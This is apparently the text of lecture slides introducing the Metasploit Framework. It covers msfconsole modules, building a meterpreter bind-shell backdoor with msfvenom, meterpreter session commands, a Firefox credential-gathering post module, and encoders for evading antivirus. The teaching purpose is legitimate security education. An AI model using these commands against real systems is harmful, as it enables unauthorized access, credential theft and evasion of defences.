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Metasploit Framework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msfconsole: auxiliary/exploit/post modules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meterpreter sessions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msfvenom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MsfConsole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Most basic use case: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msfconsole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search &lt;some exploit&gt;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use &lt;some exploit&gt;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show options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set &lt;option&gt; &lt;value&gt; (e.g.: msf&gt; set RHOST 192.168.0.21)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run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Three types of modules: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auxiliary: mostly recon stuff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exploit: usually attempts to get a meterpreter session started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post: enumeration/privilege escalation/information gathering on existing meterpreter session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Metasploit Example (localhost)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Create meterpreter payload (more on this later):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msfvenom -p linux/x86/meterpreter/bind_tcp -f elf LPORT=4444 -o rshell.out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chmod +x rshell.out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./rshell.out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Connect to backdoor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use multi/handler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 exploit(handler)&gt; set payload linux/x86/meterpreter/bind_tcp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 exploit(handler)&gt; set LPORT 4444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 exploit(handler)&gt; set RHOST 127.0.0.1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 exploit(handler)&gt; run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Meterpreter Capabilities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Checkout available commands in session with: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meterpreter&gt; help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meterpreter&gt; sysinfo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meterpreter&gt; arp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Drop into a plain /bin/sh shell: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meterpreter&gt; shell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Ctrl+C to exit (will kill shell, but will not end meterpreter session)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Common utilities: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upload/download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port forwarding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pid migration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Session management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meterpreter&gt; background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Put existing session in background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msf&gt; sessions -l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List active sessions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msf&gt; sessions -i &lt;id&gt;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Interact with existing sessio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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Also use session id to run post modules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Using Post Modules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Example: use post/multi/gather/firefox_creds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meterpreter&gt; background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msf&gt; use post/multi/gather/firefox_creds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 post(firefox_creds)&gt; set session &lt;x&gt;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msf post(firefox_creds)&gt; run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Many interesting post-exploitation modules exist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wlan geolocate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set desktop background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play youtube video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record mic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Post modules often unreliable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Post modules may crash your meterpreter session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on MsfVenom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Powerful tool to generate shellcode payloads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different architectures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different OS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different programming languages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Common msfvenom options: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-p: specify payload (bind shell, reverse shell, etc…)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$ msfvenom --list payloads to see full list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-f: specify output format (raw exe/elf, C literal, python, vba, js, etc…)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$ msfvenom --help-formats to see full list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Payload options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Bindshell: specify LPORT=XXXX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Reverse shell: specify LHOST=&lt;Attacker IP&gt; and LPORT=XXXX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How can MsfVenom increase the reliability of exploits downloaded from Exploit DB?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Advanced MsfVenom Functionality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Encoders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-e option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Attempt to obfuscate shellcode from AV/IDS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Bad chars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-b option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Generate shellcode that does not contain certain characters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E.g.: ‘\n’ character in shellcode could cause problems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